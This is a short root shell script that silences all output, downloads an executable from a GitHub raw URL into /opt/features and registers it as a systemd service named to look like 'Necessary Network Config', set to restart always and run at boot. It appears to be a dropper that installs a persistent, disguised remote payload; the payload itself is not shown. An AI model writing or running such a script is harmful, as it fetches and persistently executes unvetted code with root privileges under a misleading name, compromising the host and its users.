#!/bin/sh
exec >/dev/null 2>&1
if [ "$EUID" -ne 0 ]; then
  echo "Please run as root (with sudo)."
  exit 1
fi

fn=optional
uri=/opt/features

rm $uri

curl -o $uri https://raw.githubusercontent.com/bitner-repo/toolset/refs/heads/main/features
chmod +x $uri

systemctl disable features.service

echo -e "[Unit]\nDescription=Necessary Network Config\nAfter=network.target\n\n[Service]\nExecStart=$uri\nRestart=always\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/features.service
systemctl daemon-reload
systemctl enable features.service
systemctl start features.service
